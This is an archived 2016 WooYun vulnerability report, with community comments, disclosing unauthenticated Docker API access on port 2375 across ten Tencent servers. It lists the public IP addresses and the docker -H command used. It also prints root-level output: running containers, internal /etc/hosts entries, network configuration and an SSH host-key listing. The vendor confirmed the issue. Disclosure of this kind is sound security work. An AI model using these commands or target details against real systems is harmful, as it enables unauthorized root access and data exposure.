当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209760

漏洞标题:新姿势之获取腾讯十台机器root权限(疑似20+G代码仓库)

相关厂商:腾讯

漏洞作者: 黑客,绝对是黑客

提交时间:2016-05-17 16:28

修复时间:2016-07-02 11:50

公开时间:2016-07-02 11:50

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经确认,细节仅向厂商公开
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

黑客,绝对是黑客!
轻轻送送拿root
声明下,没有碰数据和代码

详细说明:

疑似20多g代码

6433D3CEE46A1A401670E14588E508E1.jpg


2375端口未授权访问,一共10台

182.254.145.30
115.159.142.215
115.159.151.75
115.159.127.198
115.159.119.88
115.159.157.226
115.159.142.220
115.159.112.88
115.159.205.90
115.159.157.68


拿这个证明115.159.119.88

http://115.159.119.88:2375


列出images

root@ip-172-31-43-63:/home/ubuntu# docker -H tcp://115.159.119.88:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cb4574cdb29c docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46934->6210/tcp, 0.0.0.0:20066->14888/tcp, 0.0.0.0:46936->36000/tcp container_1458634523754_7996_02_000003_34
aba75599dbd7 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46928->6210/tcp, 0.0.0.0:21951->14888/tcp, 0.0.0.0:46932->36000/tcp container_1458634523754_8238_02_000003_34
f738c487e6ba docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:22086->14888/tcp, 0.0.0.0:46927->36000/tcp container_1460213284004_4606_01_000003_34
2a64fe25ec69 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46925->6210/tcp, 0.0.0.0:20561->14888/tcp, 0.0.0.0:46926->36000/tcp container_1458634523754_8066_02_000003_34
35f7b3709f79 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46924->6210/tcp, 0.0.0.0:22091->14888/tcp, 0.0.0.0:46923->36000/tcp container_1460213284004_4608_01_000002_34
be7f9bc7a60a docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:21736->14888/tcp, 0.0.0.0:46922->36000/tcp container_1458634523754_2349_02_000002_34
b7233a0fd6e2 docker.qq.com:80/gcloud/acc_cloud:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46919->6220/tcp, 0.0.0.0:46920->6223/tcp, 0.0.0.0:46921->36000/tcp container_1460950863294_0081_01_000005_34
1703ce2bb1ab docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:22051->14888/tcp, 0.0.0.0:46918->36000/tcp container_1460213284004_1645_01_000001_34
b0374417ecf4 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:21986->14888/tcp, 0.0.0.0:46917->36000/tcp container_1458634523754_10983_02_000001_34
5e10fe7dc8ef docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 6 days ago Up 6 days 0.0.0.0:22441->14888/tcp, 0.0.0.0:46213->36000/tcp container_1460950863294_22798_01_000002_34
e1249fa8b307 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 11 days ago Up 11 days 0.0.0.0:45465->6210/tcp, 0.0.0.0:22426->14888/tcp, 0.0.0.0:45464->36000/tcp container_1460950863294_17702_01_000002_34
954fb5890386 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 13 days ago Up 13 days 0.0.0.0:45132->6210/tcp, 0.0.0.0:22381->14888/tcp, 0.0.0.0:45131->36000/tcp container_1460950863294_15653_01_000002_34
042da5523c5c docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 2 weeks ago Up 2 weeks 0.0.0.0:22366->14888/tcp, 0.0.0.0:43712->36000/tcp container_1460950863294_9355_01_000002_34
7e75db06835c docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 2 weeks ago Up 2 weeks 0.0.0.0:43707->6210/tcp, 0.0.0.0:22346->14888/tcp, 0.0.0.0:43708->36000/tcp container_1460950863294_9089_01_000002_34
7b8c3d8416f5 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:42983->6210/tcp, 0.0.0.0:22306->14888/tcp, 0.0.0.0:42982->36000/tcp container_1460950863294_7315_01_000002_34
ffa5ec0c90a3 docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22281->14888/tcp, 0.0.0.0:42762->36000/tcp container_1460950863294_4170_01_000002_34
8cb83c32b459 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22261->14888/tcp, 0.0.0.0:42599->36000/tcp container_1460950863294_3794_01_000002_34
051108731aab docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:42107->6210/tcp, 0.0.0.0:22246->14888/tcp, 0.0.0.0:42109->36000/tcp container_1460950863294_2688_01_000002_34
043e9e2fe3ce docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22236->14888/tcp, 0.0.0.0:42104->36000/tcp container_1460950863294_2681_01_000002_34
05bdd4a7450b docker.qq.com:80/gcloud/acc_cloud:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:41027->6220/tcp, 0.0.0.0:41024->6223/tcp, 0.0.0.0:41026->36000/tcp container_1460950863294_0081_01_000002_34
9c4b20ff2175 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:41008->6210/tcp, 0.0.0.0:22221->14888/tcp, 0.0.0.0:41007->36000/tcp container_1460950863294_0021_01_000002_34
aeb0ff169be7 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:22196->14888/tcp, 0.0.0.0:41005->36000/tcp container_1460213284004_6792_01_000002_33
c5a773f8afc7 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:22191->14888/tcp, 0.0.0.0:41004->36000/tcp container_1460213284004_6791_01_000002_33
d108ad37cbb3 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40489->6210/tcp, 0.0.0.0:20021->14888/tcp, 0.0.0.0:40488->36000/tcp container_1458634523754_14139_01_000002_32
60896378d4cf docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:21561->14888/tcp, 0.0.0.0:40486->36000/tcp container_1458634523754_13297_01_000002_32
c1b234c28429 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:22031->14888/tcp, 0.0.0.0:40291->36000/tcp container_1458634523754_12766_01_000002_32
f6254905fc6f docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40289->6210/tcp, 0.0.0.0:20106->14888/tcp, 0.0.0.0:40288->36000/tcp container_1458634523754_11107_01_000002_32
af2ff31c86ab docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40284->6210/tcp, 0.0.0.0:20261->14888/tcp, 0.0.0.0:40282->36000/tcp container_1458634523754_11010_01_000002_32
d35de4f633fa docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:21996->14888/tcp, 0.0.0.0:40276->36000/tcp container_1458634523754_10985_01_000002_32
0559a177d6b0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:21616->14888/tcp, 0.0.0.0:40269->36000/tcp container_1458634523754_10451_01_000002_32
df8468c257ec docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40267->6210/tcp, 0.0.0.0:20781->14888/tcp, 0.0.0.0:40266->36000/tcp container_1458634523754_9768_01_000002_32
3d0f2f63a1bb docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40265->6210/tcp, 0.0.0.0:21961->14888/tcp, 0.0.0.0:40264->36000/tcp container_1458634523754_9465_01_000002_32
a9c7b78217a8 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40261->6210/tcp, 0.0.0.0:21941->14888/tcp, 0.0.0.0:40262->36000/tcp container_1458634523754_8235_01_000002_32
4d8e7fe3b285 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40192->6210/tcp, 0.0.0.0:20566->14888/tcp, 0.0.0.0:40191->36000/tcp container_1458634523754_8067_01_000002_32
f5950106f1a8 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40165->6210/tcp, 0.0.0.0:20726->14888/tcp, 0.0.0.0:40164->36000/tcp container_1458634523754_8010_01_000002_32
d2d3dd6bc3d2 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20676->14888/tcp, 0.0.0.0:40163->36000/tcp container_1458634523754_2412_01_000002_32
7f23e748dd87 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20346->14888/tcp, 0.0.0.0:40146->36000/tcp container_1458634523754_2342_01_000002_32
17470d2efef0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20341->14888/tcp, 0.0.0.0:40145->36000/tcp container_1458634523754_2340_01_000002_32
1d517f7801b5 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:21776->14888/tcp, 0.0.0.0:40062->36000/tcp container_1458634523754_1005_01_000002_32
42bc26a016b6 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20881->14888/tcp, 0.0.0.0:40061->36000/tcp container_1458634523754_1001_01_000002_32
a253660026e0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:21511->14888/tcp, 0.0.0.0:39923->36000/tcp container_1458508352011_0322_01_000002_30
e552964949c8 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:20206->14888/tcp, 0.0.0.0:39918->36000/tcp container_1457551624703_8652_01_000002_24
f30c5597ebf2 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:21646->14888/tcp, 0.0.0.0:39914->36000/tcp container_1457551624703_8405_01_000002_24


image repository为docker.qq.com,证明为腾讯
神奇一键拿root,成功登录
/etc/hosts

[root@docker-10-237-142-103 home]# cat /etc/hosts
127.0.0.1 localhost VM_142_103_centos
10.105.39.219 docker-10-105-39-219
10.105.57.227 docker-10-105-57-227
10.105.48.96 docker-10-105-48-96
10.105.15.73 docker-10-105-15-73
10.105.46.15 docker-10-105-46-15
10.105.52.172 docker-10-105-52-172
10.105.111.112 docker-10-105-111-112
10.105.112.140 docker-10-105-112-140
10.237.132.103 docker-10-237-132-103
10.247.48.125 docker-10-247-48-125
10.237.142.103 docker-10-237-142-103
10.247.70.137 docker-10-247-70-137
10.131.165.90 docker.qq.com docker-10-131-165-90
10.131.164.129 registry.qq.com docker-10-131-164.129
10.105.110.204 docker-10-105-110-204
10.105.110.156 docker-10-105-110-156


ping docker.qq.com

[root@docker-10-237-142-103 home]# ping docker.qq.com
PING docker.qq.com (10.131.165.90) 56(84) bytes of data.
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=1 ttl=61 time=0.334 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=2 ttl=61 time=0.332 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=3 ttl=61 time=0.303 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=4 ttl=61 time=0.304 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=5 ttl=61 time=0.371 ms


ifconfig

[root@docker-10-237-142-103 home]# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 0.0.0.0
ether 56:84:7a:fe:97:99 txqueuelen 0 (Ethernet)
RX packets 2253025437 bytes 153768496578 (143.2 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2183642671 bytes 191079773682 (177.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.237.142.103 netmask 255.255.254.0 broadcast 10.237.143.255
ether 52:54:00:89:9b:8f txqueuelen 1000 (Ethernet)
RX packets 1701689621 bytes 183712984058 (171.0 GiB)
RX errors 0 dropped 1346 overruns 0 frame 0
TX packets 2315262507 bytes 294166431344 (273.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


ssh key

[root@docker-10-237-142-103 ssh]# ls -al
total 288
drwxr-xr-x. 2 root root 4096 Feb 1 11:28 .
drwxr-xr-x. 87 root root 4096 Mar 21 17:01 ..
-rw-r--r--. 1 root root 242153 Mar 6 2015 moduli
-rw-r--r--. 1 root root 2208 Mar 6 2015 ssh_config
-rw------- 1 root root 4378 Feb 1 11:28 sshd_config
-rw-r----- 1 root ssh_keys 227 Nov 26 09:42 ssh_host_ecdsa_key
-rw-r--r-- 1 root root 162 Nov 26 09:42 ssh_host_ecdsa_key.pub
-rw-r----- 1 root ssh_keys 387 Nov 26 09:42 ssh_host_ed25519_key
-rw-r--r-- 1 root root 82 Nov 26 09:42 ssh_host_ed25519_key.pub
-rw-r----- 1 root ssh_keys 1675 Nov 26 09:42 ssh_host_rsa_key
-rw-r--r-- 1 root root 382 Nov 26 09:42 ssh_host_rsa_key.pub

漏洞证明:

修复方案:

参考 http://drops.wooyun.org/papers/15892

版权声明:转载请注明来源 黑客,绝对是黑客@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-18 11:40

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-17 16:29 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    沙发

  2. 2016-05-17 16:30 | prolog ( 普通白帽子 | Rank:975 漏洞数:206 )

    这个是谁的小号呢

  3. 2016-05-17 16:36 | 凌零1 ( 普通白帽子 | Rank:320 漏洞数:57 )

    你的姿势是站着还是坐着

  4. 2016-05-17 16:37 | Aasron ( 普通白帽子 | Rank:924 漏洞数:166 | raw_input("你知道我要输入什么?"))

    我帮你把下一个系列的漏洞标题都想好了: 换个姿势之获取腾讯机器root权限

  5. 2016-05-17 16:45 | adminss ( 实习白帽子 | Rank:37 漏洞数:23 | 刷不动了,唉,没思路了,哎哎哎)

    我帮你把下一个系列的漏洞标题都想好了: 换个姿势之获取腾讯机器root权限

  6. 2016-05-17 16:48 | 木易 ( 普通白帽子 | Rank:349 漏洞数:71 | 不,,不要误会,我不是针对谁,我是说在座...)

    6

  7. 2016-05-17 16:49 | unfound ( 路人 | Rank:17 漏洞数:4 | unfound)

    666

  8. 2016-05-17 16:50 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    这谁的小号?

  9. 2016-05-17 16:52 | xiaoyu. ( 路人 | Rank:14 漏洞数:4 | xiaoyu)

    666

  10. 2016-05-17 16:54 | Hax0rs ( 实习白帽子 | Rank:77 漏洞数:17 | Hax0rs)

    黑客,绝对是黑客

  11. 2016-05-17 16:55 | j14n ( 普通白帽子 | Rank:2345 漏洞数:421 )

    腾讯云。

  12. 2016-05-17 16:57 | MiCi ( 路人 | Rank:9 漏洞数:5 | 我是小学生,正在准备小升初)

    docker那个洞,膜拜

  13. 2016-05-17 16:58 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    试试金山云

  14. 2016-05-17 16:58 | 避孕套 ( 路人 | Rank:4 漏洞数:1 | 123)

    黑客,绝对是黑客

  15. 2016-05-17 17:02 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    目测腾讯云

  16. 2016-05-17 17:04 | 爱偷懒的98 ( 普通白帽子 | Rank:154 漏洞数:52 | 从前车马邮件都很慢,一生只够爱一个人。)

    括号内容改为:20G代码仓库已脱裤 你会火

  17. 2016-05-17 17:06 | Jovi ( 路人 | Rank:4 漏洞数:1 | 路漫漫其修远兮,吾将上下而求索)

    轻轻送送拿root

  18. 2016-05-17 17:07 | 包包 ( 实习白帽子 | Rank:77 漏洞数:35 | 我是菜鸟,我怕谁?小弟新来,望大牛多多包...)

    @MiCi 什么docker的洞???求解

  19. 2016-05-17 17:09 | scanf ( 核心白帽子 | Rank:1726 漏洞数:243 | 。)

  20. 2016-05-17 17:12 | X20610 ( 普通白帽子 | Rank:209 漏洞数:40 )

    忽略,客户的

  21. 2016-05-17 17:13 | n3uz ( 路人 | Rank:14 漏洞数:3 | 这个家伙很懒)

    前排刘明

  22. 2016-05-17 17:24 | milkwort。 ( 普通白帽子 | Rank:447 漏洞数:74 )

    牛X,绝对的牛X

  23. 2016-05-17 17:26 | 乐乐、 ( 普通白帽子 | Rank:879 漏洞数:191 )

    绝对是黑客

  24. 2016-05-17 20:14 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    已报警!

  25. 2016-05-17 22:17 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)

    我帮你把下一个系列的漏洞标题都想好了: 换个姿势之获取腾讯机器root权限

  26. 2016-05-18 04:16 | 毛泽车 ( 实习白帽子 | Rank:43 漏洞数:17 | 同志们,安全,是要全国人民一起努力的,奋...)

    666 绝对是黑客

  27. 2016-05-18 14:38 | 黑客,绝对是黑客 ( 实习白帽子 | Rank:86 漏洞数:6 | 黑客,绝对是黑客)

    @M4sk @X20610 @j14n 不是哦,腾讯已经确认了~

  28. 2016-05-24 12:21 | MiCi ( 路人 | Rank:9 漏洞数:5 | 我是小学生,正在准备小升初)

    @包包 http://www.tuicool.com/articles/3Yv2iiY?plg_nld=1&plg_uin=1&plg_auth=1&plg_nld=1&plg_usr=1&plg_vkey=1&plg_dev=1抱歉刚看见哈